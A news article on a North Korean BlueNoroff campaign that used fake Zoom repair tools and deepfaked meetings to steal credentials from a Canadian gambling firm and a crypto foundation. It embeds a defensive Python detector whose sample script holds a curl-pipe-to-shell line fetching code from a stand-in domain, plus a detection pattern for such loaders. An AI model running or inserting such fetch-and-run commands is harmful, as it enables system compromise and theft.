An Ottawa-based security provider says North Korean hackers were behind a Zoom-themed attack on an unnamed Canadian gambling provider.
In a blog post, the cybersecurity company Field Effect claimed that a “North Korean threat actor” named BlueNoroff carried out the attack as part of a “broader Zoom-themed campaign traced back to at least March 2025.”
‘North Korean Zoom Attacks’ On The Rise?
The security provider explained that on the morning of May 28, the gambling firm’s employees had scheduled a Zoom meeting on crypto-related matters with a contact they had previously worked with.
During the call, the gambling firm employees complained of a range of audio issues and pop-up warnings. The contact prompted the victim to run a “Zoom audio repair tool.”
However, the interlocutor was a hacker “impersonating a known contact.”
Soon, the “tool” installer began downloading benign software that leveraged legitimate Zoom components and permissible domains.
However, Field Effect explained that a closer examination of the script revealed “approximately 10,000 blank lines, followed by a command to download and execute an initial malware script.”
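As an added example (not code from the Field Effect report), here is a small Python check for the padding trick described above: it measures the longest run of blank lines in a script and flags the file when that padding is followed by a download-and-execute command. The two sample scripts and the `zoom-example.invalid` domain are constructed for the demonstration.

```python
import re

# Constructed sample mimicking the described "audio repair tool": a shell
# script with ~10,000 blank lines, then one line that fetches and runs code.
PADDED_SCRIPT = (
    "#!/bin/sh\n"
    + "\n" * 10000
    + "curl -fsSL https://zoom-example.invalid/fix.sh | sh\n"
)

# Constructed benign script of the kind a real audio check might look like.
BENIGN_SCRIPT = (
    "#!/bin/sh\n"
    "echo 'Checking audio devices'\n"
    "system_profiler SPAudioDataType\n"
)

# Patterns that pipe downloaded content straight into an interpreter,
# or decode an embedded blob (common second-stage loaders).
DOWNLOAD_EXEC = re.compile(
    r"\b(curl|wget)\b[^\n|;]*\|\s*(sh|bash|zsh|python3?)\b"
    r"|\bbase64\s+(-d|--decode)\b"
)


def analyze_script(text: str, min_blank_run: int = 500) -> dict:
    """Summarise blank-line padding and loader commands in a script.

    A file is marked suspicious only when a long run of blank lines
    (>= min_blank_run) is combined with a download-and-execute line;
    either signal alone is common in legitimate scripts.
    """
    lines = text.splitlines()
    longest = run = blank = 0
    for line in lines:
        if line.strip() == "":
            blank += 1
            run += 1
            longest = max(longest, run)
        else:
            run = 0
    hits = [ln for ln in lines if DOWNLOAD_EXEC.search(ln)]
    return {
        "total_lines": len(lines),
        "blank_lines": blank,
        "longest_blank_run": longest,
        "download_exec_lines": hits,
        "suspicious": longest >= min_blank_run and bool(hits),
    }
```

Run `analyze_script` over installer scripts received through chat or meeting links before anyone executes them; the blank-line statistics also make the padding obvious in a diff viewer that a 10,000-line scroll would hide.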
The gambling firm employees were eventually redirected to a Zoom-themed domain that “is not affiliated with the official Zoom platform.”
Once installed, the malware allegedly let the hackers collect sensitive information from the gambling firm’s networks.
These included keychain files and web browser profiles, such as login data, cookies, history, and extension settings.
The group’s historical activity and its post-exploitation behaviour suggest that it was hunting for crypto, as well as additional assets, harvestable credentials, and enterprise data.
The campaign employed a combination of social engineering methods and layered persistence.
The security company said there was a “strong likelihood” that the hackers wanted to steal coins from the gambling firm’s linked crypto wallets.
Field Effect claims that BlueNoroff is a financially motivated subgroup of the North Korean state-sponsored Lazarus Group.
Did Lazarus Mastermind the Hack?
Analysts say that Lazarus has pulled off a vast number of hacks since it was founded in 2010. The most recent of these is allegedly the $11 million hack of the Taiwan-based crypto exchange BitPro in May.
Experts allege Lazarus is a unit of the Pyongyang-based Reconnaissance General Bureau. They say its goal is to generate funds for the North Korean regime.
Pyongyang has repeatedly denied allegations that it operates teams of crypto-hunting hackers, claiming that cyber-subterfuge is the unique preserve of Washington and its allies.
Field Effect claimed that BlueNoroff is also known as APT38, Stardust Chollima, BeagleBoyz, and NICKEL GLADSTONE.
It said the group consistently targets financial institutions, crypto firms, gaming companies, entertainment players, and fintech providers based in South Korea, Japan, North America, and Europe.
Security Firms: Hackers Operate on LinkedIn, Telegram
Earlier this month, the cybersecurity provider Huntress reported on its blog that an unnamed crypto firm also suffered a security breach at the hands of BlueNoroff.
The provider wrote: “An employee at a cryptocurrency foundation received a message from an external contact on their Telegram. The message requested time to speak to the employee.”
It continued: “The attacker sent a Calendly link to set up a meeting time. The link was for a Google Meet event. But when clicked, the URL redirected the end user to a fake Zoom domain controlled by the threat actor.”
Similarly, the crypto firm staffer then joined the group Zoom meeting, which “contained several deepfakes of known senior leadership within their company.”
When the crypto company employee experienced microphone issues, the deepfakes prompted them to download malware disguised as a Zoom extension, providing a link via Telegram.
Social Engineering Attacks
South Korean security providers have previously accused North Korean hackers of orchestrating sophisticated scams using virus-containing software distributed on platforms like LinkedIn.
In some cases, hackers have reportedly circulated trojans disguised as PDF files, LinkedIn updates, and Microsoft PowerPoint documents.
In many cases, would-be attackers allegedly pose as former employees or account executives at job search companies.
Last month, public prosecutors in South Korea said they were investigating a man they suspect of launching illegal gambling sites with the help of Pyongyang-based hackers.